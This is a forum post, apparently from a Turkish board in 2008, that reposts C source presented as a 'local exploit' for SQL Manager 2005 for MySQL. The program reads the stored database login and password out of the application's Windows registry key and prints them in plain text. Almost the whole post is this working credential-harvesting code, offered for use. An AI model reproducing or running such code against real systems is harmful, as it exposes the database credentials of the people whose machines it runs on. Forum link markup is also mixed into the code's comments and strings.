SQL Manager 2005 for MySQL Local Exploit

tarafından **[[ HAN ]]** Salı Ocak 22, 2008 5:00 am

Kod:: <code> /***************************************************************** * *SQL Manager 2005 for MySQL Local Exploit by SaCReDSeeR * *Application: SQL Manager 2005 for MySQL *Procuder: [url=http://www.sqlmanager.net/]www.sqlmanager.net[/url] *Vulnerable Description: SQL Manager 2005 for MySQL discloses passwords to local users. * *Coded by: SaCReDSeeR *Web: [url=http://www.keremvaris.com/]www.keremvaris.com[/url] *Mail: sacredseer[at]keremvaris[dot]com * *****************************************************************/ #include "stdafx.h" #include "stdio.h" #include "windows.h" HKEY hKey; #define BUFSIZE 100 char Login[BUFSIZE], Password[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; int main(void) { if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\EMS\\MySQL Manager\\Repository\\Databases\\Item0", 0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "Login", NULL, NULL, (LPBYTE) Login, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ RegCloseKey(hKey); printf("En error occured!"); return 0; } lRet = RegQueryValueEx( hKey, "Password", NULL, NULL, (LPBYTE) Password, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ RegCloseKey(hKey); printf("En error occured!"); return 0; } RegCloseKey( hKey ); printf("SQL Manager 2005 for MySQL Local Exploit by SaCReDSeeR\n"); printf("[url=http://www.keremvaris.com/n]www.keremvaris.com\n[/url]"); printf("[url=http://the-ha.yetkin-forum.com/mailto:sacredseer@keremvaris.com.com%5Cn%5Cn]sacredseer@keremvaris.com.com\n\n[/url]"); printf("Username: %s\n",Login); printf("Password: %s\n",Password); } else{ printf("SQL Manager 2005 for MySQL is not installed on your system!\n"); } return 0; } </code>